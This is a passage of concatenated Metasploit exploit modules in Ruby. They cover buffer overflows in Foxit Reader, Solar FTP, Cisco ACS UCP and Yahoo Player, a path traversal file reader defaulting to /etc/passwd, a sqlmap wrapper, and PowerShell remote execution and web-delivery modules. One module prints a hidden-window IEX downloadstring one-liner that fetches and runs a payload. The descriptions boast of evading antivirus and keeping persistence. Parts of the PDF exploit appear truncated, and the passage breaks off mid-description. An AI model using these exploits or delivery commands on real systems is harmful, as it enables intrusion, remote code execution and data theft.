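      # Send a WRQ request to begin the transfer
      pkt = ''
      pkt << "\x00\x02"  # Opcode (WRQ)
      pkt << "test.exe"  # Filename
      pkt << "\x00"      # Null byte terminator
      pkt << "octet"     # Mode
      pkt << "\x00"      # Null byte terminator

      udp_sock.put(pkt)

      # A WRQ is acknowledged with ACK block 0; anything else means the server
      # refused the write and there is no point sending data.
      return unless tftp_ack?(udp_sock.recvfrom(1024), 0)

      # Same port (69) is used to transfer our data packets (per the original
      # note the server does not switch to a new TID as RFC 1350 describes --
      # not verified here). A chunk shorter than 512 bytes is treated by the
      # TFTP server as the last data packet, which is why the loop runs up to
      # and including exe.length: an EXE whose size is an exact multiple of 512
      # gets a final empty block to terminate the transfer.
      counter = 1
      0.step(exe.length, 512) do |i|
        data = ''
        data << "\x00\x03"          # Opcode (DATA)
        data << [counter].pack('n') # Block number
        data << exe[i, 512]         # Data

        print_status("Sending block ##{counter}")
        udp_sock.write(data)

        # See if each data packet is delivered correctly before sending the next
        return unless tftp_ack?(udp_sock.recvfrom(1024), counter)

        counter += 1
      end
    ensure
      disconnect_udp
    end
  end

  # Inspects one datagram returned by udp_sock.recvfrom (a [data, host, port]
  # triple; an empty data field means nothing arrived) and returns true only
  # when it is a TFTP ACK for +expected_block+. The reply is always hex-dumped
  # (the original dumped the whole triple's inspect string, not the packet),
  # and an ERROR packet (opcode 5: error code + NUL-terminated message) is
  # decoded so the reason for a refused write is visible to the operator.
  def tftp_ack?(res, expected_block)
    data = Array(res).first.to_s
    print_status("Response:\n#{Rex::Text.to_hex_dump(data).chomp}")

    if data.length < 4
      print_error("No (or truncated) reply from the TFTP server")
      return false
    end

    opcode, num = data.unpack('nn')
    return true if opcode == 4 && num == expected_block

    if opcode == 5
      msg = data[4..-1].to_s.split("\x00").first
      print_error("TFTP error #{num}: #{msg}")
    else
      print_error("Unexpected reply (opcode #{opcode}, block #{num}), expected ACK #{expected_block}")
    end
    false
  end
end

--------------------------------------------------------------------------------
/modules/exploits/unstable/unreliable/windows/fileformat/foxit_pdf_action_bof.rb:
--------------------------------------------------------------------------------
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'zlib'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::PDF
  include Msf::Exploit::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack based buffer overflow in Foxit Reader 3.0 builds 1301 and earlier.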
27 | }, 28 | 'License' => MSF_LICENSE, 29 | 'Author' => 30 | [ 31 | 'bannedit', # Metasploit module 32 | ], 33 | 'Version' => '$Revision$', 34 | 'References' => 35 | [ 36 | [ 'CVE' , '2009-0837' ], 37 | [ 'OSVDB', '55614' ], 38 | [ 'BID', '34035'], 39 | [ 'URL', 'http://www.coresecurity.com/content/foxit-reader-vulnerabilities'], 40 | ], 41 | 'DefaultOptions' => 42 | { 43 | 'EXITFUNC' => 'process', 44 | 'DisablePayloadHandler' => 'true', 45 | }, 46 | 'Payload' => 47 | { 48 | 'Space' => 316, 49 | 'BadChars' => "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0d\x22\x28\x29\x2F\x5c\x3c\x3e\x5e\x7e" 50 | }, 51 | 'Platform' => 'win', 52 | 'Targets' => 53 | [ 54 | [ 'Foxit Reader 3.0 Windows XP SP3', { 'Ret' => 0x01847e7a} ], # ebp + offset 55 | ], 56 | 'DisclosureDate' => 'Mar 09 2009', 57 | 'DefaultTarget' => 0)) 58 | 59 | register_options([ 60 | OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), 61 | ], self.class) 62 | 63 | end 64 | 65 | def exploit 66 | pdf = make_pdf 67 | file_create(pdf) 68 | handler 69 | end 70 | 71 | def make_pdf 72 | hunter, egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true }) 73 | 74 | action = "\n<>/NewWindow true>>" 81 | 82 | pdf = "%PDF-1.4\n" 83 | pdf << "1 0 obj\n" 84 | pdf << "<>/Contents 2 0 R " 86 | pdf << "/Annots[ 24 0 R 25 0 R 9 0 R ]>>\n" 87 | pdf << "endobj\n" 88 | pdf << "4 0 obj\n" 89 | pdf << "<>\n" 90 | pdf << "endobj\n" 91 | pdf << "7 0 obj\n" 92 | pdf << "<>\n" 93 | pdf << "endobj\n" 94 | pdf << "9 0 obj\n" 95 | pdf << "<>/BE<>/MK<>>>/AP<>/T()/A 12 0 R /AA 17 0 R >>\n" 98 | pdf << "endobj\n" 99 | pdf << "16 0 obj\n" 100 | pdf << action 101 | pdf << "endobj\n" 102 | pdf << "17 0 obj\n" 103 | pdf << "<>\n" 104 | pdf << "endobj\n" 105 | pdf << "trailer\n" 106 | pdf << "<<00000000000000000000000000000000>]" 107 | pdf << "/DocChecksum/00000000000000000000000000000000/Size 31>>\n" 108 | pdf << "startxref\n" 109 | pdf << "0000\n" 110 | pdf << "%%EOF\n" 111 | pdf 112 | end 113 | end 114 | 
115 | =begin 116 | https://dev.metasploit.com/redmine/issues/5854 117 | =end 118 | -------------------------------------------------------------------------------- /modules/exploits/unstable/unreliable/windows/ftp/solarftp_pasv.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Exploit::Remote 15 | 16 | include Msf::Exploit::Remote::Ftp 17 | Rank = AverageRanking 18 | 19 | def initialize(info={}) 20 | super(update_info(info, 21 | 'Name' => 'Solar FTP 2.1.1 PASV Command Buffer Overflow', 22 | 'Description' => %q{ 23 | This module exploits a Solar FTP 2.1.1 Server Buffer Overflow 24 | when passing an overly long argument to the PASV command. This 25 | vulnerability has been found by Craig Freyman and Gerardo Iglesias. 
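},
      'Author'         =>
        [
          #'Craig Freyman (@cd1zz) and Gerardo Iglesias (@iglesiasgg)',#Initial disclosure/PoC
          'Alberto Certo ', #Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'OSVDB', '70439'],
          [ 'URL', 'http://www.exploit-db.com/exploits/17527/' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'       => 2000,
          'BadChars'    => "\x00",
          'DisableNops' => true,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested on: Windows XP SP2/SP3 EN-FR
          [ 'Windows XP Universal',
            {
              'Ret'      => 0x1001bd23, # jmp eax in sfsweb.dll
              'Offset'   => 123,
              'BuffSize' => 2127,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 12 2011'))

    register_options(
      [
        Opt::RPORT(21)
      ],self.class)
  end

  # Banner-based detection. A CheckCode is returned on every path: the original
  # rescued ::Exception (which also swallows Interrupt, i.e. the operator's
  # Ctrl-C) and then fell out of the method with nil, so a connection failure
  # looked like "no result" to the framework instead of an explicit Unknown.
  # Only the socket-level failures connect/banner can raise are rescued.
  def check
    connect
    disconnect

    if banner =~ /Solar FTP Server/
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  rescue ::Rex::ConnectionError, ::Rex::TimeoutError, ::EOFError, ::Errno::ECONNRESET, ::Errno::EPIPE => e
    print_error("An error has occured: #{e}")
    return Exploit::CheckCode::Unknown
  end

  def exploit

    connect_login
    print_status("Trying target #{target.name}...")

    # The RET address points to a JMP EAX that jumps at the beginning of a buffer
    # containing the forged PASV command below. However, the first 8 bytes are
    # overwritten with junk code. Depending on the generated NOP sled, the server
    # can crash due to non-readable instructions. We prepend then a string ("BEEFF")
    # to our sploit string to force making the junk code harmless.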
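sploit = "BEEFF" + make_nops(target['Offset']-7) + Rex::Arch::X86.jmp_short(4)
    sploit << [target.ret].pack('V')
    sploit << payload.encoded
    sploit << make_nops(target['BuffSize'] - sploit.length)

    send_cmd( ['PASV', sploit] , false)

    handler
    disconnect
  end
end

--------------------------------------------------------------------------------
/modules/exploits/unstable/untested/arachni_path_traversal.rb:
--------------------------------------------------------------------------------
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Arachni Path Traversal Module',
      'Description' => %q{
        It exploits path traversal vulnerabilities in order to read the contents of a remote file.
        It will also try to clean-up any HMTL code that does not belong to the file.

        This module is designed to be used with the Arachni plug-in.
      },
      'Author'      => [
        'Tasos "Zapotek" Laskos ',
      ],
      'License'     => BSD_LICENSE,
      'Version'     => '$Revision$',
      'References'  =>
        [
          ['URL', 'http://github.com/Zapotek/arachni']
        ]
    ))

    register_options( [
      OptString.new( 'GET', [ false, "GET parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
      OptString.new( 'POST', [ false, "POST parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
      OptString.new( 'COOKIES', [ false, "Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
      OptString.new( 'HEADERS', [ false, "Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)", "" ] ),
      OptString.new( 'PATH', [ true, "The path to the vulnerable script.", "/cgi-bin/generic" ] ),
      OptString.new( 'FILE', [ true, "The file to grab.", "/etc/passwd" ] ),
    ], self.class )
  end

  # Fetches FILE through the traversal twice -- once for the requested file and
  # once for '/', which cannot be a regular file -- and prints only the text
  # present in the first response but absent from the second, i.e. the file
  # contents stripped of the page's own markup. Bails out (after get_file has
  # reported why) when either request yields no body; the original called
  # .split on that nil. datastore['FILE'] is restored even if a request raises.
  def run
    file_orig = datastore['FILE'].dup
    begin
      body = get_file
      return unless body
      splits_file = body.split( /\w*$/ )

      datastore['FILE'] = '/'

      body = get_file
      return unless body
      splits_empty = body.split( /\w*$/ )

      # There must be a better way to get the diff but this is good enough for now
      print_line( (splits_file - splits_empty).join )
    ensure
      datastore['FILE'] = file_orig.dup
    end
  end

  # Sends one request with the XXinjectionXX markers replaced by FILE and
  # returns the response body, or nil (after print_error) when nothing was
  # marked for injection or no response came back.
  #
  # The original passed 0.01 as send_request_cgi's response timeout, i.e. ten
  # milliseconds, so practically every target timed out (nil) and res.body
  # raised NoMethodError; the mixin's default timeout is used instead.
  def get_file
    cookies = _sub_injection( datastore['COOKIES'].to_s, ';' )
    headers = _str_to_hash( _sub_injection( datastore['HEADERS'].to_s, '::' ), '::' )
    post    = _str_to_hash( _sub_injection( datastore['POST'].to_s ) )
    get     = _str_to_hash( _sub_injection( datastore['GET'].to_s ) )
    uri     = datastore['PATH'].to_s
    method  = post.empty? ? 'GET' : 'POST'

    if post.empty? && get.empty? && headers.empty? && cookies.empty?
      print_error( 'At least one of GET/POST/COOKIES/HEADERS must be set.' )
      return nil
    end

    print_status( "Sending HTTP request for #{uri}" )
    res = send_request_cgi( {
      'global'    => true,
      'uri'       => uri,
      'method'    => method,
      'vars_get'  => get,
      'vars_post' => post,
      'headers'   => headers,
      'cookie'    => cookies
    } )

    unless res
      print_error( "No response from #{rhost}:#{rport} for #{uri}" )
      return nil
    end

    res.body.to_s
  end

  #
  # Converts a URI styled query string into a key=>value hash
  # (parts without a '=' are skipped)
  #
  def _str_to_hash( str, sep = '&' )
    hash = {}
    str.split( sep ).each do |part|
      key, value = part.split( '=', 2 )
      next if !key || !value
      hash[key] = value
    end

    return hash
  end

  #
  # Substitutes 'XXinjectionXX' in values of a URI styled query string with the
  # payload (datastore['FILE']); parts without a '=' are dropped
  #
  def _sub_injection( str, sep = '&' )
    parts = str.to_s.split( sep ).map do |var|
      k, v = var.split( '=', 2 )
      next if !v || !k

      k + "=" + v.gsub( 'XXinjectionXX', datastore['FILE'].to_s )
    end
    parts.compact.join( sep )
  end

end

--------------------------------------------------------------------------------
/modules/exploits/unstable/untested/arachni_sqlmap.rb:
--------------------------------------------------------------------------------
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Arachni SQLMAP SQL Injection External Module',
      'Description' => %q{

        This module is designed to be used with the Arachni plug-in.

        From the original:

        This module launches an sqlmap session.
        sqlmap is an automatic SQL injection tool developed in Python.
        Its goal is to detect and take advantage of SQL injection
        vulnerabilities on web applications.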
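Once it detects one
        or more SQL injections on the target host, the user can
        choose among a variety of options to perform an extensive
        back-end database management system fingerprint, retrieve
        DBMS session user and database, enumerate users, password
        hashes, privileges, databases, dump entire or user
        specific DBMS tables/columns, run his own SQL SELECT
        statement, read specific files on the file system and much
        more.
      },
      'Author'     => [
        'Tasos "Zapotek" Laskos ', # modified to work with the Arachni plug-in
        'Bernardo Damele A. G. ' # original module: auxiliary/scanner/http/sqlmap.rb
      ],
      'License'    => BSD_LICENSE,
      'Version'    => '$Revision$',
      'References' =>
        [
          ['URL', 'http://github.com/Zapotek/arachni'],
          ['URL', 'http://sqlmap.sourceforge.net'],
        ]
    ))

    register_options(
      [
        OptString.new('METHOD', [ true, "HTTP Method", 'GET' ]),
        OptString.new('PATH', [ true, "The path to test for SQL injection", 'index.php' ]),
        OptString.new('GET', [ false, "HTTP GET query", 'id=1' ]),
        OptString.new('POST', [ false, "The data string to be sent through POST", '' ]),
        OptString.new('COOKIES', [ false, "The cookie string to be sent with the request", '' ]),
        OptString.new('OPTS', [ false, "The sqlmap options to use", '--users --time-test --passwords --dbs --sql-shell -v 0' ]),
        OptPath.new('SQLMAP_PATH', [ true, "The sqlmap >= 0.8 full path ", 'sqlmap' ]),
        # run() already consulted datastore['BATCH'] but nothing registered it
        OptBool.new('BATCH', [ false, "Run sqlmap non-interactively (--batch)", false ]),
      ], self.class)
  end

  # Builds the sqlmap command line from the datastore and executes it.
  #
  # sqlmap is started with system(*argv) -- one argument per element, no shell --
  # because the original single-quoted every value into one string and ran it
  # through the shell: a "'" inside a parameter, cookie or POST body (values the
  # Arachni plug-in takes from the scanned site) escaped the quoting and ran as a
  # command on the operator's own host. OPTS stays a free-form string and is
  # split with shell rules by Shellwords.
  def run
    require 'shellwords' # stdlib; only needed to parse OPTS

    sqlmap = datastore['SQLMAP_PATH']

    if not sqlmap
      print_error("The sqlmap script could not be found")
      return
    end

    begin
      opts = Shellwords.split(datastore['OPTS'].to_s)
    rescue ::ArgumentError => e
      # unbalanced quote in OPTS
      print_error("Could not parse OPTS: #{e}")
      return
    end

    data   = datastore['POST'].to_s.gsub('XXinjectionXX', '')
    method = datastore['METHOD'].to_s.upcase

    # Interpolation rather than String#+: RPORT may be an Integer in the datastore.
    # A leading '/' in PATH is dropped so the URL never contains "//".
    scheme = datastore['SSL'] ? "https" : "http"
    path   = datastore['PATH'].to_s.sub(%r{\A/+}, '')
    sqlmap_url = "#{scheme}://#{datastore['RHOST']}:#{datastore['RPORT']}/#{path}"
    if method == "GET"
      sqlmap_url << '?' << datastore['GET'].to_s.gsub('XXinjectionXX', '')
    end

    argv = [sqlmap, '-u', sqlmap_url, '--method', method]
    argv.concat(opts)

    # The original always passed --cookie '' ; only pass it when a value is set.
    cookies = datastore['COOKIES'].to_s
    argv.push('--cookie', cookies) unless cookies.empty?
    argv.push('--data', data) unless data.empty?
    argv << '--batch' if datastore['BATCH'] == true

    print_status("exec: #{Shellwords.join(argv)}")
    system(*argv)
  end

end

--------------------------------------------------------------------------------
/modules/exploits/unstable/untested/cisco_acs_ucp.rb:
--------------------------------------------------------------------------------
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

# Every other module in this tree requires the core before defining the class;
# this one relied on the loader having done it already.
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Cisco ACS 4.1 with UCP enabled pre-authentication buffer overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in CSUserCGI.exe which
        is Cisco's UCP CGI script for allowing users to change their passwords
        through ACS. The CGI /securecgi-bin/CSUserCGI.exe suffers from multiple buffer
        overflows exploitable remotely through the HTTP protocol before authentication.

        ACS/UCP versions prior to 4.2 are affected.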
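},
      'Author'         =>
        [
          'Felix FX Lindner', # original discovery, poc
          'Lincoln'           # metasploit
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2008-0532'],
          ['URL', 'http://www.securityfocus.com/archive/1/489463'],
          # was a bare one-element array (no reference type), which the
          # framework's reference parser cannot turn into a reference
          ['URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20080312-ucp']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          # everything outside printable ASCII plus '+', ';', '~' and DEL:
          # the buffer travels inside the query string
          'BadChars'       => [*(0x00..0x20)].pack("C*") + [0x2b, 0x3b, 0x7e, 0x7f].pack("C*") + [*(0x80..0xff)].pack("C*"),
          'EncoderOptions' =>
            {
              'BufferRegister' => 'EDX'
            }
        },
      'Platform'       => 'win',
      'Privileged'     => false,
      'Targets'        =>
        [
          # custom p/p/r taking advantage of null from CSUserCGI.exe
          [ 'Windows 2003 SP0 Eng', { 'Ret' => 0x414a7042, }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 03 2008'))

    register_options(
      [
        Opt::RPORT(80)
      ], self.class )
  end

  # Sends the overflow in the CSUserCGI.exe "Logout" query string. The stub
  # (push esi / pop edx) hands the payload its own base in EDX, which is why
  # the encoder is told BufferRegister => 'EDX' above.
  #
  # NOTE(review): the buffer carries raw bytes (\x7a\x7c, \x66\x81\xc2\xac,
  # \xeb\x24) that fall inside the module's own BadChars set, and the "+"
  # bytes are documented as standing in for nulls; whether the CGI decodes the
  # query string that way, and whether send_request_cgi leaves this URI
  # unencoded, has not been verified here -- the module is marked untested.
  def exploit

    stub_asm = %Q|
      push esi
      pop edx
    |

    stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub_asm).encode_string

    buffer = "\x7a\x7c"
    buffer << rand_text_alpha(92)
    buffer << [target.ret].pack('V')
    buffer << "+" #act as null
    buffer << rand_text_alpha(27)
    buffer << stub
    buffer << "\x66\x81\xc2\xac"
    buffer << "+" #act as null
    buffer << "\xeb\x24"
    buffer << rand_text_alpha(36)
    buffer << payload.encoded

    print_status("Sending HTTP request")
    send_request_cgi({
      'uri'    => '/securecgi-bin/CSUserCGI.exe?Logout+' + buffer,
      'method' => 'GET'
    }, 25)

    disconnect
    handler
  end
end

--------------------------------------------------------------------------------
/modules/exploits/unstable/untested/yahoo_player_m3u.rb:
--------------------------------------------------------------------------------
##
# $Id$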
3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Exploit::Remote 15 | Rank = GoodRanking 16 | 17 | include Msf::Exploit::FILEFORMAT 18 | include Msf::Exploit::Remote::Seh 19 | 20 | def initialize(info = {}) 21 | super(update_info(info, 22 | 'Name' => 'yahoo! player 1.5 (.m3u) Universal Buffer Overflow (SEH)', 23 | 'Description' => %q{ 24 | This module exploits a stack-based buffer overflow in Yahoo! Player 1.5.01.409. 25 | An attacker must send the file to victim and the victim must open the file. 26 | Alternatively it may be possible to execute code remotely via an embedded 27 | PLS file within a browser, when the PLS extention is registered to Yahoo! Player 1.5.01.409. 28 | This functionality has not been tested in this module. 
29 | }, 30 | 'License' => MSF_LICENSE, 31 | 'Author' => 32 | [ 33 | 'D3r K0n!G', 34 | 'Death-Shadow-Dark ', 35 | ], 36 | 'References' => 37 | [ 38 | [ 'URL', 'http://www.exploit-db.com/exploits/17735' ], 39 | ], 40 | 'Payload' => 41 | { 42 | 'Space' => 5000, 43 | 'BadChars' => "\x00", 44 | 'StackAdjustment' => -3500, 45 | }, 46 | 'Platform' => 'win', 47 | 'Targets' => 48 | [ 49 | [ 'Windows Universal', { 'Ret' => 0x300117f7 } ], 50 | ], 51 | 'Privileged' => false, 52 | 'DisclosureDate' => 'Aug 28 2011', 53 | 'DefaultTarget' => 0)) 54 | 55 | register_options( 56 | [ 57 | OptString.new('FILENAME', [ true, 'The file name.', 'msf.m3u']), 58 | ], self.class) 59 | 60 | end 61 | 62 | def exploit 63 | 64 | sploit = rand_text_alpha_upper(2049) 65 | sploit << generate_seh_payload(target.ret) 66 | sploit << rand_text_alpha_upper(12) 67 | 68 | print_status("Creating '#{datastore['FILENAME']}' file ...") 69 | 70 | file_create(sploit) 71 | 72 | end 73 | 74 | end 75 | 76 | =begin 77 | http://dev.metasploit.com/redmine/issues/6381 78 | =end 79 | -------------------------------------------------------------------------------- /modules/exploits/windows/dcerpc/wmis_psh.rb: -------------------------------------------------------------------------------- 1 | # -*- coding: binary -*- 2 | 3 | ## 4 | # This module requires Metasploit: http//metasploit.com/download 5 | # Current source: https://github.com/rapid7/metasploit-framework 6 | ## 7 | 8 | require 'msf/core' 9 | require 'msf/core/exploit/powershell' 10 | 11 | 12 | class Metasploit3 < Msf::Exploit::Remote 13 | Rank = ManualRanking 14 | 15 | include Exploit::Remote::SMB::Authenticated 16 | include Msf::Exploit::Powershell 17 | 18 | def initialize(info = {}) 19 | super(update_info(info, 20 | 'Name' => 'Microsoft Windows Authenticated Powershell Command Execution', 21 | 'Description' => %q{ 22 | }, 23 | 24 | 'Author' => [ 25 | 'Ben Campbell ' 26 | ], 27 | 28 | 'License' => MSF_LICENSE, 29 | 'Privileged' => true, 30 | 'DefaultOptions' 
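=>
        {
          'WfsDelay' => 20,
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 01 1999',
      'References'     => [
        [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
        [ 'OSVDB', '3106'],
        [ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ],
        [ 'URL', 'http://sourceforge.net/projects/smbexec/' ],
        [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
      ]
    ))
  end

  # Builds the PowerShell one-liner for the selected payload and hands it to
  # the local `pth-wmis` binary, which runs it on RHOST with the SMB
  # credentials from the datastore.
  #
  # `pth-wmis` is started with the argv form of Kernel#system, so no local
  # shell parses the credentials or the command: a password or command that
  # contains shell metacharacters ('"', ';', '$', '&', ...) can neither break
  # the invocation nor execute anything on the operator's own host.  The old
  # single-string form needed `command.gsub!("$", "\\\\$")` to keep /bin/sh
  # from expanding PowerShell variables; with no shell in the path that
  # escaping is unnecessary and would now reach the target as literal
  # backslashes, so it is gone.  The credentials are still visible in the
  # local process list while pth-wmis runs, as with any secret passed in argv.
  #
  # Fails the run with BadConfig when RUN_WOW64 is combined with an x64
  # target, and prints an error when pth-wmis cannot be started or exits
  # non-zero (system() returns nil and false respectively; both were ignored
  # before).
  def exploit
    command = cmd_psh_payload(payload.encoded,
                  payload_instance.arch.first,
                  {:remove_comspec => true})

    if datastore['PERSIST'] and not datastore['DisablePayloadHandler']
      print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PERSIST option.")
    end

    if datastore['RUN_WOW64'] and target_arch.first == "x86_64"
      fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled")
    end

    user = datastore['SMBUser']
    pass = datastore['SMBPass']
    # pth-wmis takes DOMAIN/USER%PASS; the domain prefix is optional.
    domain = "#{datastore['SMBDomain']}/" if datastore['SMBDomain']

    # argv form: every element is handed to pth-wmis verbatim.
    local_argv = [
      "pth-wmis",
      "-U", "#{domain}#{user}%#{pass}",
      "//#{datastore['RHOST']}",
      command
    ]

    ok = system(*local_argv)
    if ok.nil?
      print_error("#{peer} - pth-wmis could not be started (is it installed and on PATH?)")
    elsif !ok
      print_error("#{peer} - pth-wmis failed: #{$?}")
    end
  end

  # host:port string used in log lines.
  def peer
    return "#{datastore['RHOST']}:#{datastore['RPORT']}"
  end
end

--------------------------------------------------------------------------------
/modules/exploits/windows/misc/psh_web_delivery.rb:
--------------------------------------------------------------------------------
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: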
https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | require 'msf/core/exploit/powershell' 8 | 9 | class Metasploit3 < Msf::Exploit::Remote 10 | Rank = NormalRanking 11 | 12 | include Msf::Exploit::Remote::HttpServer 13 | include Msf::Exploit::Powershell 14 | 15 | def initialize(info = {}) 16 | super(update_info(info, 17 | 'Name' => 'PowerShell Payload Web Delivery', 18 | 'Description' => %q{ 19 | This module quickly fires up a web server that serves the payload in PowerShell. 20 | The provided command will start PowerShell and then download and execute the 21 | payload. The IEX command can also be extracted to execute directly from PowerShell. 22 | The main purpose of this module is to quickly establish a session on a target 23 | machine when the attacker has to manually type in the command himself, e.g. RDP 24 | Session, Local Access or maybe Remote Command Exec. This attack vector does not 25 | write to disk so is less likely to trigger AV solutions and will allow privilege 26 | escalations supplied by Meterpreter. Ensure the payload architecture matches the 27 | target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. 28 | }, 29 | 'License' => MSF_LICENSE, 30 | 'Author' => 31 | [ 32 | 'Ben Campbell ', 33 | 'Chris Campbell' #@obscuresec - Inspiration n.b. no relation! 
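],
      'References'     =>
        [
          [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ],
          [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
          [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 19 2013'))
  end

  # HttpServer callback: answers a request for the served URI with the
  # PowerShell payload script.
  #
  # The script comes from cmd_psh_payload for the payload's architecture;
  # :remove_comspec leaves the cmd.exe wrapper out and :use_single_quotes
  # makes the result safe inside the single-quoted IEX string that `primer`
  # prints.  The request is not inspected, so there is no client check and no
  # one-shot limit: anything that fetches the URI receives the script.
  #
  # The previous call to Msf::Util::EXE.to_win32pe_psh_net was removed -- its
  # result was never used, so it only built an unused executable per request.
  #
  # @param cli the requesting client, passed through to send_response
  # @param request the HTTP request (unused)
  def on_request_uri(cli, request)
    print_status("Delivering Payload")
    psh = cmd_psh_payload(payload.encoded,
                payload_instance.arch.first,
                {
                  :remove_comspec => true,
                  :use_single_quotes => true
                })
    send_response(cli, psh, { 'Content-Type' => 'application/octet-stream' })
  end

  # Prints the one-liner the operator runs on the target: a hidden-window,
  # no-profile powershell.exe that downloads the served script and IEXes it.
  def primer
    url = get_uri
    download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
    print_status("Run the following command on the target machine:")
    print_line generate_psh_command_line({
      :noprofile   => true,
      :windowstyle => 'hidden',
      :command     => download_and_run
    })
  end
end

--------------------------------------------------------------------------------
/modules/exploits/windows/smb/psexec_psh.rb:
--------------------------------------------------------------------------------
# -*- coding: binary -*-

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/powershell'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  # Exploit mixins should be called first
  include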
Msf::Exploit::Remote::SMB::Psexec 16 | include Msf::Exploit::Powershell 17 | 18 | def initialize(info = {}) 19 | super(update_info(info, 20 | 'Name' => 'Microsoft Windows Authenticated Powershell Command Execution', 21 | 'Description' => %q{ 22 | This module uses a valid administrator username and password to execute a powershell 23 | payload using a similar technique to the "psexec" utility provided by SysInternals. The 24 | payload is encoded in base64 and executed from the commandline using the -encodedcommand 25 | flag. Using this method, the payload is never written to disk, and given that each payload 26 | is unique, is less prone to signature based detection. Since executing shellcode in .NET 27 | requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture 28 | must match that of the payload. Lastly, a persist option is provided to execute the payload 29 | in a while loop in order to maintain a form of persistence. In the event of a sandbox 30 | observing PSH execution, a delay and other obfuscation may be added to avoid detection. 31 | In order to avoid interactive process notifications for the current user, the psh payload has 32 | been reduced in size and wrapped in a powershell invocation which hides the window entirely. 
